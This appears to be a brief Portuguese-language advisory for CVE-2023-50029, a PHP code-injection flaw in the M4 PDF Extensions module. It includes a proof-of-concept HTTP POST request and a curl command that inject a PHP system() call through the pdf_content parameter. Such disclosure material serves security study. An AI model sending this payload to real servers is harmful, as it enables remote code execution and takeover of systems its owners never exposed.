
CVE-2023-50029: Vulnerabilidade de Injeção PHP no Módulo M4 PDF Extensions
CVE-2023-50029 é uma vulnerabilidade de injeção PHP no módulo M4 PDF Extensions. Esta vulnerabilidade permite que invasores injetem e executem código PHP arbitrário no servidor, permitindo-lhes obter controle total sobre o sistema alvo. O problema reside na validação inadequada das entradas, permitindo que código malicioso seja passado por meio de parâmetros de usuário.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"